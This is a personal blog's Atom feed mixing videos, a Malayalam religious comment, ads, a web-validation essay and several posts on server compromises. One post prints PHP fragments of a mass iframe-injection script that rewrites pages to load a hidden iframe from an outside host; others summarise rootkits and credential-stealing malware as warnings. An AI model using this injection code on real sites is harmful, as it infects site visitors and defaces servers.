<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6138071674270960067</id><updated>2011-11-27T16:24:06.413-08:00</updated><title type='text'>Jobin C John</title><subtitle type='html'>Skilled in Website development</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>10</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-7466296603638376249</id><published>2011-01-15T06:00:00.000-08:00</published><updated>2011-01-15T06:00:39.348-08:00</updated><title type='text'>Makarajyothi</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/i58IaLnICrs/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/i58IaLnICrs?f=videos&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266" src="http://www.youtube.com/v/i58IaLnICrs?f=videos&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-7466296603638376249?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/7466296603638376249/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2011/01/makarajyothi.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/7466296603638376249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/7466296603638376249'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2011/01/makarajyothi.html' title='Makarajyothi'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-1679863073032600997</id><published>2011-01-15T05:50:00.001-08:00</published><updated>2011-01-15T05:52:30.823-08:00</updated><title type='text'>അവിശ്വാസം</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/LNsinpBiCaI/0.jpg"&gt;&lt;param name="movie" value="http://www.youtube.com/v/LNsinpBiCaI?f=videos&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266" src="http://www.youtube.com/v/LNsinpBiCaI?f=videos&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-1679863073032600997?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/1679863073032600997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2011/01/blog-post_15.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/1679863073032600997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/1679863073032600997'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2011/01/blog-post_15.html' title='അവിശ്വാസം'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-6862796463316430553</id><published>2011-01-15T05:42:00.001-08:00</published><updated>2011-01-15T05:42:45.215-08:00</updated><title type='text'>ക്ഷേത്രം പണിതത് മനുഷ്യര്</title><content type='html'>ക്ഷേത്രം പണിതത് മനുഷ്യര്‍, അകത്തുള്ള മൂര്‍ത്തി പണിതതം മനുഷ്യര്‍, പൂജാരിയും മനുഷ്യൻ ദര്‍ശനത്തിന് എത്തണതും മനുഷ്യര്‍ അങ്ങനിരിക്കേ മകരവിളക്ക് മനുഷ്യ സൃഷ്ടിയാണെങ്കില്‍ എന്ത് പ്രശ്നം.....!!&lt;br /&gt;അപകടത്തില്‍ പെട്ട് അനേകര്‍ മരിച്ച ഈ സമയത്ത് അതിനെ പറ്റി ചിന്തിക്കാതെ മകരവിളക്കിന്റെ വിശ്വാസതയെ ചോദ്യം ചെയ്യുവാൻ തത്രപ്പെടുന്ന ഇവരെല്ലാം മനുഷ്യരോ അതോ കൃത്രിമമായി സൃഷ്ടിക്കപ്പെട്ട വല്ല ജീവികളോ..?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-6862796463316430553?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/6862796463316430553/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2011/01/blog-post.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/6862796463316430553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/6862796463316430553'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2011/01/blog-post.html' title='ക്ഷേത്രം പണിതത് മനുഷ്യര്'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-6901023992575711655</id><published>2009-07-16T02:49:00.000-07:00</published><updated>2009-07-16T02:50:11.579-07:00</updated><title type='text'>Why we won’t help you</title><content type='html'>There is one scenario I see play out again and again on Web Design-L, css-discuss, and countless other forums. Newbie Designer posts a link to a test page, asking for help because it doesn’t behave as expected in this or that browser. Guru Designer replies, telling Newbie Designer that their page doesn’t validate, and that they should go validate their page before asking such questions. There is no further discussion; no further replies are posted; no one else is willing to help.&lt;br /&gt;&lt;br /&gt;Why does this happen? Why won’t we help you?&lt;br /&gt;&lt;br /&gt;The short, smart-alec, Zen-like answer is that we are helping you, you just don’t realize it yet. The full answer goes like this:&lt;br /&gt;&lt;br /&gt;   &lt;span style="font-weight:bold;"&gt;1.&lt;/span&gt;Validation may reveal your problem. Many cases of "it works in one browser but not another" are caused by silly author errors. Typos like missing attribute values can cause browsers to crash; validation catches these typos. Simple errors like missing end tags (such as &lt;/table&gt; or &lt;/div&gt;) or missing elements (such as &lt;tr&gt;) can cause different problems in different browsers. Small mistakes like this are difficult for you to spot in your own code, but the validator pinpoints them immediately.&lt;br /&gt;&lt;br /&gt;      I am not claiming that your page, once validated, will automatically render flawlessly in every browser; it may not. I am also not claiming that there aren’t talented designers who can create old-style "Tag Soup" pages that do work flawlessly in every browser; there certainly are. But the validator is an automated tool that can highlight small but important errors that are difficult to track down by hand. If you create valid markup most of the time, you can take advantage of this automation to catch your occasional mistakes. But if your markup is nowhere near valid, you’ll be flying blind when something goes wrong. The validator will spit out dozens or even hundreds of errors on your page, and finding the one that is actually causing your problem will be like finding a needle in a haystack.&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-6901023992575711655?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/6901023992575711655/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/07/why-we-wont-help-you.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/6901023992575711655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/6901023992575711655'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/07/why-we-wont-help-you.html' title='Why we won’t help you'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-8913940369064814661</id><published>2009-07-15T07:36:00.000-07:00</published><updated>2009-07-15T07:37:13.972-07:00</updated><title type='text'>VIPRE Antivirus</title><content type='html'>VIPRE Antivirus + Antispyware is a new PC security software created by Sunbelt Software. We created VIPRE to be faster than most traditional security software like Norton or McAfee. VIPRE will not slow down your PC and it is highly effective at preventing and curing PC Infections. We would like your help promoting VIPRE to the public.&lt;br /&gt;&lt;a href="http://www.sunbeltsoftware.com/Home-Home-Office/VIPRE/"&gt;Antivirus Software&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-8913940369064814661?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/8913940369064814661/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/07/vipre-antivirus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/8913940369064814661'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/8913940369064814661'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/07/vipre-antivirus.html' title='VIPRE Antivirus'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-7647074528932075444</id><published>2009-06-28T01:29:00.000-07:00</published><updated>2009-06-28T01:30:14.018-07:00</updated><title type='text'>Adds</title><content type='html'>&lt;a href="http://www.bearmarketingsystem.com/jrox.php?uid=jobinckat_1_bid_4"&gt;&lt;img src="http://www.bearmarketingsystem.com/image.php?bid=4&amp;mid=8268" width="120" height="600" border="0"/&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-7647074528932075444?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/7647074528932075444/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/06/adds.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/7647074528932075444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/7647074528932075444'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/06/adds.html' title='Adds'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-2152514096347457064</id><published>2009-06-17T02:35:00.001-07:00</published><updated>2009-06-17T02:37:02.048-07:00</updated><title type='text'>amazing specials on Hotels</title><content type='html'>Asiarooms.com is offering amazing specials on Hotels in Thailand, Indonesia, Malaysia, Japan and China. &lt;a href="http://revtwt.com/198478"&gt;http://revtwt.com/198478&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-2152514096347457064?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/2152514096347457064/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/06/amazing-specials-on-hotels.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/2152514096347457064'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/2152514096347457064'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/06/amazing-specials-on-hotels.html' title='amazing specials on Hotels'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-6528430769775917750</id><published>2009-06-16T02:23:00.000-07:00</published><updated>2009-06-16T02:26:12.089-07:00</updated><title type='text'>sample code for creating i-frame virus</title><content type='html'>Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script , it looked like this:&lt;br /&gt;&lt;br /&gt;  for ($i = 3; $i &lt; 500; $i++) {&lt;br /&gt;      if ($i == 438) continue;&lt;br /&gt;      flush_buffer('&lt;b&gt;/home/sites/site' . $i . '/web&lt;/b&gt;:&lt;br&gt;');&lt;br /&gt;      iframe_account(array('/home/sites/site' . $i . '/web'));&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().&lt;br /&gt;&lt;br /&gt;This function takes every director and performs a recursive search for 4 file types:&lt;br /&gt;&lt;br /&gt;  $file_types = array('php', 'htm', 'html', 'tpl');&lt;br /&gt;&lt;br /&gt;It then opens the files and searches for the “&lt;/body&gt;” tag which is replaced with the malicious iframe and properly closed:&lt;br /&gt;&lt;br /&gt;  $iframed_content = str_replace(/'&lt;/body&gt;/', '&lt;iframe src=http://[REMOVED].info/counter style=display:none&gt;&lt;/iframe&gt;&lt;/body&gt;', $content);&lt;br /&gt;&lt;br /&gt;And lol – a mass attack happened.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-6528430769775917750?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/6528430769775917750/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/06/sample-code-for-creating-i-frame-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/6528430769775917750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/6528430769775917750'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/06/sample-code-for-creating-i-frame-virus.html' title='sample code for creating i-frame virus'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-9075927766371608025</id><published>2009-06-16T01:34:00.000-07:00</published><updated>2009-06-16T01:35:27.575-07:00</updated><title type='text'>Chance of virus attack and solutions.</title><content type='html'>Name     :   Flame.so / Flame.php&lt;br /&gt;Appeared :   Summer &amp; Fall 2005&lt;br /&gt;Uses     :   PHP's Dynamic Loader function - dl()&lt;br /&gt;&lt;br /&gt;Description: Attackers exploit insecure PHP scripts to&lt;br /&gt;load flame.php and flame.so on the server. The&lt;br /&gt;attacker then accesses flame.php which loads&lt;br /&gt;flame.so as a PHP module. The active PHP module&lt;br /&gt;injects malicious code within each PHP page.&lt;br /&gt;&lt;br /&gt;Systems Affected: Any system with dl() function&lt;br /&gt;enabled&lt;br /&gt;&lt;br /&gt;Disable dl() in php.ini&lt;br /&gt;– enable_dl = Off&lt;br /&gt;The specific flame.so exploit has been patched in&lt;br /&gt;PHP 4.4+ but can still be seen in different variations&lt;br /&gt;due to the nature of the dynamic loader function&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;============================================&lt;br /&gt;&lt;br /&gt;Name: Apache DSO&lt;br /&gt;Appeared: Summer &amp; Fall 2007&lt;br /&gt;Uses: Apache's Dynamic Module Support&lt;br /&gt;&lt;br /&gt;Description: Attackers exploit an insecure script to&lt;br /&gt;place custom Apache module on the server. The&lt;br /&gt;attackers then use a specially crafted URL to load the&lt;br /&gt;module using Apache's Dynamic Module support.&lt;br /&gt;This allows malicious code to be served into each&lt;br /&gt;request.&lt;br /&gt;&lt;br /&gt;Systems Affected: Any system running Apache 1.3.34&lt;br /&gt;and lower&lt;br /&gt;&lt;br /&gt;Uses a technique introduced in Phrack to ensure&lt;br /&gt;code modification persists to new Apache children&lt;br /&gt;http://www.phrack.org/issues.html?issue=59&amp;id=8&amp;mode=txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;============================================&lt;br /&gt;&lt;br /&gt;Name: Random JavaScript Toolkit&lt;br /&gt;Appeared: Fall &amp; Winter 2007 and Early 2008&lt;br /&gt;Uses: Root SSH Access&lt;br /&gt;&lt;br /&gt;Description: Attackers gain root login information using&lt;br /&gt;viruses placed on a user's PC. This virus sends all&lt;br /&gt;login information used on that PC to a master server&lt;br /&gt;where it is logged and used to install a rootkit which&lt;br /&gt;serves malicious content into random web requests.&lt;br /&gt;&lt;br /&gt;Systems Affected: RedHat 4/5, CentOS 4/5&lt;br /&gt;&lt;br /&gt;Modifies 7 System Binaries&lt;br /&gt;– /sbin/ifconfig&lt;br /&gt;-/sbin/fsck&lt;br /&gt;– /sbin/route&lt;br /&gt;-/bin/basename&lt;br /&gt;– /bin/cat&lt;br /&gt;-/bin/mount&lt;br /&gt;– /bin/touch&lt;br /&gt;Technically not a loadable module (LKM), modifies&lt;br /&gt;kernel directly through /dev/mem&lt;br /&gt;&lt;br /&gt;Injects IFrame text into pages, after the body tag&lt;br /&gt;Sometimes random, sometimes consistent&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Need to have root to modify the binaries&lt;br /&gt;The infected binaries ensure the rootkit persists after&lt;br /&gt;a reboot&lt;br /&gt;Someone logs in as root without brute force&lt;br /&gt;Found simple port 22 passwords, and also&lt;br /&gt;convoluted passwords on random ports&lt;br /&gt;Attacker installs a rootkit based on Boxer&lt;br /&gt;Serves malicious code to random web requests&lt;br /&gt;without any direct html modification&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=============================================&lt;br /&gt;&lt;br /&gt;Name: Gozi&lt;br /&gt;Appeared: Spring 2007&lt;br /&gt;Uses: Login credentials&lt;br /&gt;Internet Explorer lets Winsock handle SSL, Gozi&lt;br /&gt;hooks this&lt;br /&gt;Also takes all client certificates from the Windows&lt;br /&gt;certificate store&lt;br /&gt;&lt;br /&gt;Requests are encrypted and repeated to a data&lt;br /&gt;collecting machine via HTTP in real time&lt;br /&gt;Protocols like FTP, SMTP, IMAP, POP, HTTP all use&lt;br /&gt;plain text&lt;br /&gt;In order to obtain passwords, just watch the Ethernet&lt;br /&gt;traffic&lt;br /&gt;It's easy to download Winpcap and windump&lt;br /&gt;Tools have existed for years in Linux that use&lt;br /&gt;libpcap and grab all login information from plaintext&lt;br /&gt;protocols&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-9075927766371608025?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/9075927766371608025/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/06/chance-of-virus-attack-and-solutions.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/9075927766371608025'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/9075927766371608025'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/06/chance-of-virus-attack-and-solutions.html' title='Chance of virus attack and solutions.'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6138071674270960067.post-4290596873708775068</id><published>2009-06-16T01:24:00.000-07:00</published><updated>2009-06-16T01:31:27.937-07:00</updated><title type='text'>Attention to web developers about massive hacking attack</title><content type='html'>It looks like the attack usually has two stages.&lt;br /&gt;&lt;br /&gt;•    Account passwords harvesting. On the first state they collect passwords for the accounts.  We can call this stage "account passwords harvesting". Details on how they do that are fuzzy. The truth is that on a typical Linux server it might enough to get just one user account password to be in a reasonably good position to get the root via some king of little known or unpatched exploit. Zones and jails are better in this respect as they protect other users from easily compromised "suckers" who happily use passwords like 123456 or use infected with spyware PCs at home.  Actually the complexity of the password should be beefed up to at least 8 characters. But this does not help if the user computer is infected with a keylogger.  ISPs need to handle vastly difference classes of users and security is always as good as the weakest link.&lt;br /&gt;&lt;br /&gt;•    On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK,  to install malicious IFrames. Usually only main site index documents were targeted (ie. index.php, index.html,  index.shtml,  etc.). Malicious IFrames are usually installed at the beginning or at the end of the document. That might be because of different tools of different version/modes of work of MPACK.  But there are other cases when all documents were modified by replacing HEAD tag&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6138071674270960067-4290596873708775068?l=toutz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://toutz.blogspot.com/feeds/4290596873708775068/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toutz.blogspot.com/2009/06/attention-to-web-developers-about.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/4290596873708775068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6138071674270960067/posts/default/4290596873708775068'/><link rel='alternate' type='text/html' href='http://toutz.blogspot.com/2009/06/attention-to-web-developers-about.html' title='Attention to web developers about massive hacking attack'/><author><name>jobin john</name><uri>http://www.blogger.com/profile/05598870613319721311</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_oj4JvUxpb4A/SjddABKZc1I/AAAAAAAAATU/1rRqfbGMq94/S220/buddy_bigger.jpg'/></author><thr:total>0</thr:total></entry></feed>
